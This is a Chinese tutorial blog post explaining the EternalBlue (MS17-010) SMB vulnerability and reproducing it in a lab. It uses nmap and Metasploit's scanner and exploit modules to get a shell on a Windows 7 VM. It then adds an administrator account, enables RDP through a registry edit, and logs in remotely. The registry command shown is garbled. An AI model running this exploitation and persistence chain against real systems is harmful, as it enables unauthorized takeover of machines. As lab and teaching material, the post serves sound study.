当前位置: 首页 > news >正文

MS17-010(永恒之蓝)漏洞分析与复现

news 2025/6/7 4:01:50

文章目录

      • 一、漏洞简介
        • 1、永恒之蓝介绍:
        • 2、漏洞原理:
        • 3、影响版本:
      • 二、漏洞复现
        • 复现环境:
        • 复现过程:
          • 1、主机发现:
          • 2、使用MSF的永恒之蓝漏洞模块
          • 3、使用ms17-010扫描模块,对靶机进行扫描:
          • 4、使用ms17-010攻击模块,对靶机进行攻击
          • 5、得到靶机shell
          • 6、通过shell对靶机进行控制

一、漏洞简介

1、永恒之蓝介绍:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、漏洞复现

复现环境:

攻击机:Linux kali(IP:192.168.50.130)

靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)

实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

复现过程:
1、主机发现:

登录 kali linux,用 nmap 探测本网段存活主机

nmap 192.168.23.0/24、

在这里插入图片描述
可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

2、使用MSF的永恒之蓝漏洞模块

打开MSF :msfconsole
在这里插入图片描述
MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢 ~( ̄▽ ̄)~

搜索 ms17-010 代码:search ms17_010
在这里插入图片描述

这里可以得到一些工具,其中 auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3、使用ms17-010扫描模块,对靶机进行扫描:

使用模块:

use auxiliary/scanner/smb/smb_ms17_010

设置目标IP或网段:

set rhosts 192.168.50.132

执行扫描:run
在这里插入图片描述
如果出现以上情况,就说明存在漏洞。

4、使用ms17-010攻击模块,对靶机进行攻击

使用模块:

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标IP

set rhosts 192.168.50.132

可以使用 show options 命令查看设置选项

在这里插入图片描述
执行攻击:exploit 或 run
在这里插入图片描述
攻击完成!

5、得到靶机shell

在这里插入图片描述
输入:chcp 65001 可解决乱码问题。
在这里插入图片描述
解决了,但是没有完全解决。

6、通过shell对靶机进行控制

1、创建新用户 ,语法:net user 用户名 密码 /add

输入:

net user sss 123456 /add

查看用户信息,命令:net user
在这里插入图片描述
可以看到添加成功了。

2、将用户sss添加至管理员组

net localgroup administrators sss /add

在这里插入图片描述
3、开启远程桌面功能

查看3389端口状态:netstat -ano
在这里插入图片描述
看到3389端口并没有开启,开启3389端口,命令:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述
3389端口开启。

4、远程桌面连接靶机

rdesktop 192.168.50.132:3389

在这里插入图片描述
使用创建的sss用户进行登录
在这里插入图片描述
登陆成功!
在这里插入图片描述
上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多。

http://www.xdnf.cn/news/832411.html

相关文章:

  • Java Class 类文件格式看这一篇就够了
  • SEH异常处理学习总结
  • linux crw权限,linux中crw brw lrw等等文件属性是什么
  • input 的 disabled和readonly 及其 限制。
  • 长链接转短链接,短链接跳转对应页面
  • 什么是IT咨询?IT外包又是什么?
  • LIBSVM入门
  • 详解IP安全:IPSec协议簇 - AH协议 - ESP协议 - IKE协议
  • dhtml是基于html的一门语言,什么是DHTML
  • 【ISP】颜色的理解
  • Matlab中利用findpeaks找波峰和波谷
  • 招生|清华大学天基网络与通信全国重点实验室
  • 约束条件(constraint)
  • 基于javaweb+mysql的springboot物业管理系统(java+springboot+maven+ssm+thymeleaf+html+jquery+mysql)
  • win11检测工具在哪 win11检测工具位置介绍
  • c盘fakepath是什么意思_C盘越用越大?告诉你什么文件可以删!
  • SVN客户端(Windows)——Tortoise SVN(中文版 )的下载及安装
  • 【网页设计期末大作业源代码】使用HTML5+CSS3+JavaScript十分钟快速制作一个简约大气设计类静态网站|自适应响应式|自制超简单的美术公司网页|直接可以修改使用|适合新手超友好易上手新手必
  • 如何清理电脑浏览器缓存,4款常用浏览器清理缓存的方法
  • 搜索引擎的网站登录入口
  • 新手入门C语言
  • SPSS是什么?
  • 17 VRRP基础(虚拟路由器冗余协议)
  • 计算机网络技术专业,热门就业方向和就业前景
  • 什么是对象数组
  • UFT使用技巧
  • SqlCommand的三种方法以及封装SqlHelper类
  • “String.h” 源代码总结
  • 什么是Symbian
  • Windows修改默认路由(Default Gateway)